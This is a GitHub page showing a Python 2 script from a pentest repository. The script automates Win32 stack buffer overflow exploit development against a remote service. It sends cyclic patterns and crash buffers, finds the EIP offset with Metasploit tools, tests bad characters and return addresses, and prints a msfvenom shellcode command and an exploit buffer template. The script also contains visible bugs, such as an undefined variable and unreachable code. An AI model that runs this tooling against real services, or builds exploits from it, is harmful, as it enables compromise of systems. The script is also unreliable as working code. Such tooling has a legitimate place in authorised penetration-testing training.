forked from jivoi/pentest
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwin32-buffer-overflow-development-and-exploitation-skeleton.py
executable file
·229 lines (194 loc) · 8.92 KB
/
win32-buffer-overflow-development-and-exploitation-skeleton.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
#!/usr/bin/python
# @Und3rf10w - 20150618
import socket
from sys import exit,argv
from subprocess import Popen, PIPE, STDOUT
# Defining the connection
def sendbuffer(host,port,buffer):
try:
print "\nSending unique evil buffer to %s:%s" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
# This next part depends on whatever the RFC is for what you're trying to
# exploit. Up to you to put the 'string' in the right place. Be sure to
# receive bytes after sending anything.
print repr(s.recv(1024)) # Grabs the banner. Do not remove
s.send(buffer) # Sends the unique string into the buffer
print repr(s.recv(1024))
print "\nBuffer sent..."
print "Please restart the service and reattach your disassembler now!"
except:
print "Could not connect to the service"
exit(2)
def eip_control_check_prompt(s):
if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
return "Excellent. Continuing to shellcode insertion"
elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
return "ERROR: Something went wrong. You don't have control over EIP"
exit(3)
else:
return "\nPlease type 'yes' or 'no'"
def increase_buffer_size_prompt(s, *args, **kwargs):
shellcode_space = kwargs.get('shellcode_space', None)
if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
return "Increasing size of buffer"
new_space = (350 - shellcode_space) + shellcode_space
return new_space
elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
return "Continuing with current shellcode space"
new_space = shellcode_space
return new_space
else:
return "\nPlease type 'yes' or 'no'"
def bad_character_prompt(s, *args, **kwargs):
if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
return True
elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
return False
else:
return "\nPlease type 'yes' or 'no'"
def return_address_test(return_address, *args, **kwargs):
pivot_address = return_address
buffer = "\x41"*(eip_offset-1) + pivot_address + "\x90"*12 + "\x43"*(available_space - (int(argv[3])- eip_offset) - 12)
sendbuffer(host, port, buffer)
raw_input("Press enter to continue once you have reattached the debugger...")
return_address = pivot_address
return return_address
def return_address_prompt(s, *args, **kwargs):
if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
return True
elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
return False
else:
return "\nPlease type 'yes' or 'no'"
def generate_report(host, port, eip_offset, available_space, bad_characters,return_address):
print "Generating report.. \n"
print """
Service
=======
%s:%d
EIP Offset Location
===================
%s
Bytes Available For Shellcode
=============================
%s
Bad Characters
==============
%s
Return Address
==============
%s""" %(host, port, eip_offset, available_space, bad_characters,return_address)
print "Modify the following command to generate your shellcode:\n"
print "msfvenom -p <payload> -f c -b '%s' -x 86 --platform windows -e x86/shikata_ga_nai <payload options>" % bad_characters
# test if script was executed correctly
if len(argv) < 3:
print "Assists with buffer overflow exploit development for Win32 binaries"
print "Usage: %s <Server IP Address or hostname> <service port> <buffer length>" % str(argv[0])
exit(1)
# Create a unique buffer from given buffer length
cmd = '/usr/share/metasploit-framework/tools/pattern_create.rb %d' % int(argv[3])
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
buffer = str(p.stdout.read())
host = str(argv[1])
port = int(argv[2])
# Send inital buffer
sendbuffer(host,port,buffer)
# Receive value of EIP register from user
eip = raw_input('\nInsert the value of EIP at the time of the crash: ') # receive the value of EIP from user
# Determine EIP offset
cmd = '/usr/share/metasploit-framework/tools/pattern_offset.rb %s' % eip
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
print p.stdout.read()
# store value of EIP offset
list = offset.split()
eip_offset = int(list[5])
# Make new confirmation buffer
buffer = "A"*eip_offset + "B"*4 + "C"*(int(argv[3]) - eip_offset)
# Send new buffer
sendbuffer(host,port,buffer)
# Ask user if they have control over EIP
prompt = raw_input("Was the value of EIP 42424242 at crash time?: ")
print(eip_control_check_prompt(prompt))
available_space = int(argv[3]) - int(eip_offset)
print "You currently have %d bytes available for shellcode execution" % int(available_space)
#initalize new_space
new_space = 0
# Check if enough space available for shellcode, returns new_space
while int(available_space) < 349:
print "\nWARN: You don't have enough space for most shellcode"
prompt = raw_input("Do you want to try a bigger buffer?: ")
shellcode_space = available_space
new_space = increase_buffer_size_prompt(prompt,shellcode_space,new_space)
buffer = 'A'*eip_offset + 'B'*4 + 'C'*((int(argv[3]) - int(eip_offset)) + int(new_space))
sendbuffer(host,port,buffer)
raw_input("Press enter to continue once you have reattached the debugger...")
available_space = available_space + new_space
print "You currently have %d bytes available for shellcode execution" % int(available_space)
if available_space >= 349:
print "Enough space availabe for shellcode execution"
break
# Check for presence of bad characters
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
buffer = "A"*eip_offset + "B"*4 + badchars
print "Attempting to check for presence of bad characters"
sendbuffer(host,port,buffer)
# initalize bad_characters and rem_char
bad_character_test_result = None
bad_characters = ""
rem_char = None
bad_char_flag = 0
prompt = raw_input("Did you encounter any bad characters?: ")
while bad_character_test_result != False:
bad_character_test_result = bad_character_prompt(prompt)
if bad_char_flag == 1:
rem_char = raw_input("\nWhat was the bad character? (\\x00): ")
if rem_char != None:
badchars.translate(None, rem_char)
bad_characters += rem_char
print "\nCurrent bad characters: '%s'" %bad_characters
buffer = "A"*eip_offset + "B"*4 + badchars
print "\nSending new buffer..."
sendbuffer(host,port,buffer)
raw_input("Press enter to continue once you have reattached the debugger...")
bad_char_flag = 1
if bad_character_test_result == False:
break
print "Identified bad characters:\n%s" % str(bad_characters)
### Return address identification ###
print "\nNow we just need to identify a return address to redirect the execution from"
return_address = None
return_address_flag = 0
return_address_test_result = None
prompt = raw_input("Did that return address work?: ")
while return_address_test_result != True:
return_address_dirty = raw_input("Set a new breakpoint on and provide the address to try to return from in little endian format ('0043D0A0' -> '\\xa0\\xd0\\x43\\x00'): ")
return_address_clean = return_address_dirty.replace("\\x","")
return_address = "\b"+return_address_clean.decode("hex")
return_address = return_address_test(return_address)
if return_address_flag == 1:
return_address_test_result = return_address_prompt(prompt)
return_address_flag = 1
if return_address_test_result == True:
break
return_address = return_address
# print "INFO: Using %s for the return address" %return_address_dirty.replace("\\x","")
generate_report(host, port, str(eip_offset), available_space, str(bad_characters), return_address)
print "Your sample exploit code in python is:\n buffer = 'A'*%s + '%s' + shellcode + <nop_sled> + 'C'*(%s-%s-%d-%d-len(shellcode)-<len(nop_sled)>)" %(str(eip_offset), return_address, str(argv[3]), str(eip_offset), len(str(return_address)), len("AUTH "))
exit(0)